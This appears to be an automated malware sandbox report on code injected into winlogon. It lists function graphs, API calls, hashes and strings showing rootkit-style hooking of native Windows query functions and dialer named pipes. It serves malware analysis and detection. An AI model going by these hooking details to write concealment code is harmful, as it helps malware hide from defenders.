                                                          control_flow_graph 263 1fc5ff9273c-1fc5ff927a4 call 1fc5ff929d4 * 4 272 1fc5ff927aa-1fc5ff927ad 263->272 273 1fc5ff929b2 263->273 272->273 274 1fc5ff927b3-1fc5ff927b6 272->274 275 1fc5ff929b4-1fc5ff929d0 273->275 274->273 276 1fc5ff927bc-1fc5ff927bf 274->276 276->273 277 1fc5ff927c5-1fc5ff927e6 VirtualAlloc 276->277 277->273 278 1fc5ff927ec-1fc5ff9280c 277->278 279 1fc5ff92838-1fc5ff9283f 278->279 280 1fc5ff9280e-1fc5ff92836 278->280 281 1fc5ff92845-1fc5ff92852 279->281 282 1fc5ff928df-1fc5ff928e6 279->282 280->279 280->280 281->282 285 1fc5ff92858-1fc5ff9286a LoadLibraryA 281->285 283 1fc5ff928ec-1fc5ff92901 282->283 284 1fc5ff92992-1fc5ff929b0 282->284 283->284 286 1fc5ff92907 283->286 284->275 287 1fc5ff928ca-1fc5ff928d2 285->287 288 1fc5ff9286c-1fc5ff92878 285->288 291 1fc5ff9290d-1fc5ff92921 286->291 287->285 289 1fc5ff928d4-1fc5ff928d9 287->289 292 1fc5ff928c5-1fc5ff928c8 288->292 289->282 294 1fc5ff92923-1fc5ff92934 291->294 295 1fc5ff92982-1fc5ff9298c 291->295 292->287 293 1fc5ff9287a-1fc5ff9287d 292->293 299 1fc5ff928a7-1fc5ff928b7 293->299 300 1fc5ff9287f-1fc5ff928a5 293->300 297 1fc5ff92936-1fc5ff9293d 294->297 298 1fc5ff9293f-1fc5ff92943 294->298 295->284 295->291 302 1fc5ff92970-1fc5ff92980 297->302 303 1fc5ff92945-1fc5ff9294b 298->303 304 1fc5ff9294d-1fc5ff92951 298->304 301 1fc5ff928ba-1fc5ff928c1 299->301 300->301 301->292 302->294 302->295 303->302 305 1fc5ff92963-1fc5ff92967 304->305 306 1fc5ff92953-1fc5ff92961 304->306 305->302 308 1fc5ff92969-1fc5ff9296c 305->308 306->302 308->302
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AllocLibraryLoadVirtual
                                                          • String ID:
                                                          • API String ID: 3550616410-0
                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction ID: fb7d19d9e5e3f15570c96ff01da83b0597c11792655209dccb7ff6ab7b5c1375
                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction Fuzzy Hash: C8611432B0169A87DB58CF1597407BD73D2F754BA4F188231DE6907B98DA38E853E780
                                                          Function 000001FC60381ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000001FC60381628: GetProcessHeap.KERNEL32 ref: 000001FC60381633
                                                            • Part of subcall function 000001FC60381628: HeapAlloc.KERNEL32 ref: 000001FC60381642
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC603816B2
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC603816DF
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC603816F9
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381719
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC60381734
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381754
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC6038176F
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC6038178F
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC603817AA
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC603817CA
                                                          • Sleep.KERNEL32 ref: 000001FC60381AD7
                                                          • SleepEx.KERNELBASE ref: 000001FC60381ADD
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC603817E5
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381805
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC60381820
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381840
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC6038185B
                                                            • Part of subcall function 000001FC60381628: RegOpenKeyExW.ADVAPI32 ref: 000001FC6038187B
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC60381896
                                                            • Part of subcall function 000001FC60381628: RegCloseKey.ADVAPI32 ref: 000001FC603818A0
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1534210851-0
                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction ID: 1dd8c1c8565e61284b89fe9bd58ce1bef889e695326cf417ad7726e642e46085
                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction Fuzzy Hash: 2A314B3129960B41EB519B26DB413F963B8BBC4BF2F0404718E2DE3395FF24C851A290

                                                          Non-executed Functions

                                                          Function 000001FC60382B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 563 1fc60382b2c-1fc60382ba5 call 1fc603a2ce0 566 1fc60382bab-1fc60382bb1 563->566 567 1fc60382ee0-1fc60382f03 563->567 566->567 568 1fc60382bb7-1fc60382bba 566->568 568->567 569 1fc60382bc0-1fc60382bc3 568->569 569->567 570 1fc60382bc9-1fc60382bd9 GetModuleHandleA 569->570 571 1fc60382bdb-1fc60382beb GetProcAddress 570->571 572 1fc60382bed 570->572 573 1fc60382bf0-1fc60382c0e 571->573 572->573 573->567 575 1fc60382c14-1fc60382c33 StrCmpNIW 573->575 575->567 576 1fc60382c39-1fc60382c3d 575->576 576->567 577 1fc60382c43-1fc60382c4d 576->577 577->567 578 1fc60382c53-1fc60382c5a 577->578 578->567 579 1fc60382c60-1fc60382c73 578->579 580 1fc60382c75-1fc60382c81 579->580 581 1fc60382c83 579->581 582 1fc60382c86-1fc60382c8a 580->582 581->582 583 1fc60382c9a 582->583 584 1fc60382c8c-1fc60382c98 582->584 585 1fc60382c9d-1fc60382ca7 583->585 584->585 586 1fc60382d9d-1fc60382da1 585->586 587 1fc60382cad-1fc60382cb0 585->587 588 1fc60382da7-1fc60382daa 586->588 589 1fc60382ed2-1fc60382eda 586->589 590 1fc60382cc2-1fc60382ccc 587->590 591 1fc60382cb2-1fc60382cbf call 1fc6038199c 587->591 592 1fc60382dbb-1fc60382dc5 588->592 593 1fc60382dac-1fc60382db8 call 1fc6038199c 588->593 589->567 589->579 595 1fc60382cce-1fc60382cdb 590->595 596 1fc60382d00-1fc60382d0a 590->596 591->590 600 1fc60382df5-1fc60382df8 592->600 601 1fc60382dc7-1fc60382dd4 592->601 593->592 595->596 603 1fc60382cdd-1fc60382cea 595->603 597 1fc60382d3a-1fc60382d3d 596->597 598 1fc60382d0c-1fc60382d19 596->598 606 1fc60382d4b-1fc60382d58 lstrlenW 597->606 607 1fc60382d3f-1fc60382d49 call 1fc60381bbc 597->607 598->597 605 1fc60382d1b-1fc60382d28 598->605 610 1fc60382e05-1fc60382e12 lstrlenW 600->610 611 1fc60382dfa-1fc60382e03 call 1fc60381bbc 600->611 601->600 609 1fc60382dd6-1fc60382de3 601->609 604 1fc60382ced-1fc60382cf3 603->604 613 1fc60382cf9-1fc60382cfe 604->613 614 1fc60382d93-1fc60382d98 604->614 617 1fc60382d2b-1fc60382d31 605->617 619 1fc60382d5a-1fc60382d64 606->619 620 1fc60382d7b-1fc60382d8d call 1fc60383844 606->620 607->606 607->614 621 1fc60382de6-1fc60382dec 609->621 615 1fc60382e14-1fc60382e1e 610->615 616 1fc60382e35-1fc60382e3f call 1fc60383844 610->616 611->610 630 1fc60382e4a-1fc60382e55 611->630 613->596 613->604 624 1fc60382e42-1fc60382e44 614->624 615->616 625 1fc60382e20-1fc60382e33 call 1fc6038152c 615->625 616->624 617->614 626 1fc60382d33-1fc60382d38 617->626 619->620 629 1fc60382d66-1fc60382d79 call 1fc6038152c 619->629 620->614 620->624 621->630 631 1fc60382dee-1fc60382df3 621->631 624->589 624->630 625->616 625->630 626->597 626->617 629->614 629->620 635 1fc60382e57-1fc60382e5b 630->635 636 1fc60382ecc-1fc60382ed0 630->636 631->600 631->621 639 1fc60382e5d-1fc60382e61 635->639 640 1fc60382e63-1fc60382e7d call 1fc603885c0 635->640 636->589 639->640 642 1fc60382e80-1fc60382e83 639->642 640->642 645 1fc60382e85-1fc60382ea3 call 1fc603885c0 642->645 646 1fc60382ea6-1fc60382ea9 642->646 645->646 646->636 648 1fc60382eab-1fc60382ec9 call 1fc603885c0 646->648 648->636
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction ID: b1b829cd5e5edf3d762ae0127b52393c6e3f1a917582e8c486b28d6ac22f944e
                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction Fuzzy Hash: 08B19C76258A5A82EB648F25C7407F963B5F7C4BA6F045076EE0DA3794EB34CD44E380
                                                          Function 000001FC60387D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction ID: f80a950f92e382aa22f3b1b4ed7887e4870ab89b10985457f6287a8d47983d04
                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction Fuzzy Hash: 2F315D72349B858AEB609F60E8803EE7371F784755F44443ADA4EA7B98EF38C548D750
                                                          Function 000001FC6038D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction ID: cc8c79ae5779d2d02f73030c671b8e5b9265532acbaca07292a22b11b5f222c0
                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction Fuzzy Hash: 40313B36258F8586DB608B25E9803EE63B0F789765F500136EA9D92B68EF38C1458B80
                                                          Function 000001FC60387960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction ID: a75b20086e11d3390a53f61fea1f0cc536be1f405284ca8ca6001e52729f2338
                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction Fuzzy Hash: D9115A32755F0A8AEB40CF60E9553B833B4F398769F440E31DA6D927A4EB78C19893C0
                                                          Function 000001FC6038DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                          • Instruction ID: a5b07c72693cfbdd6538c0cc82b138ceaa2128a872ee17a7aa83ecb3e3eaa576
                                                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                          • Instruction Fuzzy Hash: 0451F33270878589FB209B72AA407EA7BB1B7807A9F144135EE5DB7B99DB38C401D340
                                                          Function 000001FC5FFA36F0 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                          • Instruction ID: f099cbdca55cebe3e9ed8a8e6828f8229fdb883e27044f392a09e2e8cb262b3c
                                                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                          • Instruction Fuzzy Hash: 52F062B271429A8EDBAD8F2CA90276A77E1F3083C0FD08129D69983F14D23CD061DF44
                                                          Function 000001FC603812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction ID: 2c024b60987742e8177ddea78ac6fd7f26c0cfa03fcf5d9bafeabff67293486e
                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction Fuzzy Hash: E3515E36249B8986E750DF62E6443AA77B5F3C8BEAF044134DA4A57728EF3CC045D780
                                                          Function 000001FC60381D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                          • API String ID: 4175298099-1975688563
                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction ID: 209dc78b723bbc2091d1a5bdba8063a5c058a61db4576ac1b93e5ac97e205899
                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction Fuzzy Hash: BA31D67418894FA0EA05EB6AEB526F42330B7C0376F810173991DB2775AF38CA49E3D0
                                                          Function 000001FC5FF96910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 407 1fc5ff96910-1fc5ff96916 408 1fc5ff96918-1fc5ff9691b 407->408 409 1fc5ff96951-1fc5ff9695b 407->409 411 1fc5ff96945-1fc5ff96984 call 1fc5ff96fc0 408->411 412 1fc5ff9691d-1fc5ff96920 408->412 410 1fc5ff96a78-1fc5ff96a8d 409->410 415 1fc5ff96a9c-1fc5ff96ab6 call 1fc5ff96e54 410->415 416 1fc5ff96a8f 410->416 427 1fc5ff9698a-1fc5ff9699f call 1fc5ff96e54 411->427 428 1fc5ff96a52 411->428 413 1fc5ff96938 __scrt_dllmain_crt_thread_attach 412->413 414 1fc5ff96922-1fc5ff96925 412->414 423 1fc5ff9693d-1fc5ff96944 413->423 419 1fc5ff96927-1fc5ff96930 414->419 420 1fc5ff96931-1fc5ff96936 call 1fc5ff96f04 414->420 430 1fc5ff96ab8-1fc5ff96aed call 1fc5ff96f7c call 1fc5ff96e1c call 1fc5ff97318 call 1fc5ff97130 call 1fc5ff97154 call 1fc5ff96fac 415->430 431 1fc5ff96aef-1fc5ff96b20 call 1fc5ff97190 415->431 421 1fc5ff96a91-1fc5ff96a9b 416->421 420->423 440 1fc5ff969a5-1fc5ff969b6 call 1fc5ff96ec4 427->440 441 1fc5ff96a6a-1fc5ff96a77 call 1fc5ff97190 427->441 432 1fc5ff96a54-1fc5ff96a69 428->432 430->421 442 1fc5ff96b31-1fc5ff96b37 431->442 443 1fc5ff96b22-1fc5ff96b28 431->443 460 1fc5ff96a07-1fc5ff96a11 call 1fc5ff97130 440->460 461 1fc5ff969b8-1fc5ff969dc call 1fc5ff972dc call 1fc5ff96e0c call 1fc5ff96e38 call 1fc5ff9ac0c 440->461 441->410 444 1fc5ff96b39-1fc5ff96b43 442->444 445 1fc5ff96b7e-1fc5ff96b94 call 1fc5ff9268c 442->445 443->442 449 1fc5ff96b2a-1fc5ff96b2c 443->449 450 1fc5ff96b45-1fc5ff96b4d 444->450 451 1fc5ff96b4f-1fc5ff96b5d call 1fc5ffa5780 444->451 468 1fc5ff96b96-1fc5ff96b98 445->468 469 1fc5ff96bcc-1fc5ff96bce 445->469 456 1fc5ff96c1f-1fc5ff96c2c 449->456 457 1fc5ff96b63-1fc5ff96b78 call 1fc5ff96910 450->457 451->457 472 1fc5ff96c15-1fc5ff96c1d 451->472 457->445 457->472 460->428 480 1fc5ff96a13-1fc5ff96a1f call 1fc5ff97180 460->480 461->460 509 1fc5ff969de-1fc5ff969e5 __scrt_dllmain_after_initialize_c 461->509 468->469 477 1fc5ff96b9a-1fc5ff96bbc call 1fc5ff9268c call 1fc5ff96a78 468->477 470 1fc5ff96bd5-1fc5ff96bea call 1fc5ff96910 469->470 471 1fc5ff96bd0-1fc5ff96bd3 469->471 470->472 489 1fc5ff96bec-1fc5ff96bf6 470->489 471->470 471->472 472->456 477->469 502 1fc5ff96bbe-1fc5ff96bc6 call 1fc5ffa5780 477->502 498 1fc5ff96a45-1fc5ff96a50 480->498 499 1fc5ff96a21-1fc5ff96a2b call 1fc5ff97098 480->499 495 1fc5ff96bf8-1fc5ff96bff 489->495 496 1fc5ff96c01-1fc5ff96c11 call 1fc5ffa5780 489->496 495->472 496->472 498->432 499->498 510 1fc5ff96a2d-1fc5ff96a3b 499->510 502->469 509->460 511 1fc5ff969e7-1fc5ff96a04 call 1fc5ff9abc8 509->511 510->498 511->460
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                          • API String ID: 190073905-1786718095
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 6207ed237fdc8fdc478d243134ffe13447b09bea6578fb03d6545988fde0ab99
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 68819C3170424F86FA5CAB2597413F922D0EB85780F588735AA6547FB6EB38E847E780
                                                          Function 000001FC6038CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 514 1fc6038ce28-1fc6038ce4a call 1fc60396080 517 1fc6038ce69-1fc6038ce74 FlsSetValue 514->517 518 1fc6038ce4c-1fc6038ce57 FlsGetValue 514->518 521 1fc6038ce76-1fc6038ce79 517->521 522 1fc6038ce7b-1fc6038ce80 517->522 519 1fc6038ce59-1fc6038ce61 518->519 520 1fc6038ce63 518->520 523 1fc6038ced5-1fc6038cee0 SetLastError 519->523 520->517 521->523 524 1fc6038ce85 call 1fc6038d6cc 522->524 525 1fc6038cef5-1fc6038cf0b call 1fc6038c748 523->525 526 1fc6038cee2-1fc6038cef4 523->526 527 1fc6038ce8a-1fc6038ce96 524->527 538 1fc6038cf28-1fc6038cf33 FlsSetValue 525->538 539 1fc6038cf0d-1fc6038cf18 FlsGetValue 525->539 529 1fc6038cea8-1fc6038ceb2 FlsSetValue 527->529 530 1fc6038ce98-1fc6038ce9f FlsSetValue 527->530 533 1fc6038ceb4-1fc6038cec4 FlsSetValue 529->533 534 1fc6038cec6-1fc6038ced0 call 1fc6038cb94 call 1fc6038d744 529->534 532 1fc6038cea1-1fc6038cea6 call 1fc6038d744 530->532 532->521 533->532 534->523 545 1fc6038cf35-1fc6038cf3a 538->545 546 1fc6038cf98-1fc6038cf9f call 1fc6038c748 538->546 543 1fc6038cf1a-1fc6038cf1e 539->543 544 1fc6038cf22 539->544 543->546 547 1fc6038cf20 543->547 544->538 549 1fc6038cf3f call 1fc6038d6cc 545->549 550 1fc6038cf8f-1fc6038cf97 547->550 552 1fc6038cf44-1fc6038cf50 549->552 553 1fc6038cf62-1fc6038cf6c FlsSetValue 552->553 554 1fc6038cf52-1fc6038cf59 FlsSetValue 552->554 556 1fc6038cf6e-1fc6038cf7e FlsSetValue 553->556 557 1fc6038cf80-1fc6038cf8a call 1fc6038cb94 call 1fc6038d744 553->557 555 1fc6038cf5b-1fc6038cf60 call 1fc6038d744 554->555 555->546 556->555 557->550
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 000001FC6038CE37
                                                          • FlsGetValue.KERNEL32(?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CE4C
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CE6D
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CE9A
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CEAB
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CEBC
                                                          • SetLastError.KERNEL32 ref: 000001FC6038CED7
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CF0D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001FC6038ECCC,?,?,?,?,000001FC6038BF9F,?,?,?,?,?,000001FC60387AB0), ref: 000001FC6038CF2C
                                                            • Part of subcall function 000001FC6038D6CC: HeapAlloc.KERNEL32 ref: 000001FC6038D721
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CF54
                                                            • Part of subcall function 000001FC6038D744: HeapFree.KERNEL32 ref: 000001FC6038D75A
                                                            • Part of subcall function 000001FC6038D744: GetLastError.KERNEL32 ref: 000001FC6038D764
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CF65
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FC60390A6B,?,?,?,000001FC6039045C,?,?,?,000001FC6038C84F), ref: 000001FC6038CF76
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction ID: 83860ddd260a0a4c0f4eca44bb9f3af04b32f0e298e04d9d11039bef394d7117
                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction Fuzzy Hash: CB4142302E924E46F968A73557513F922727BC47B2F140BB4A93EF67D6EE38D441A280
                                                          Function 000001FC60382244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2171963597-1373409510
                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction ID: e63c8d423c3b2a3415957e980cafb2f55a603dae97fb564701e141b92a7c8165
                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction Fuzzy Hash: 37219036258B4583E7108B24E6543A963B0F3C47B6F400235EA5D52BA8EF7CC549DB80
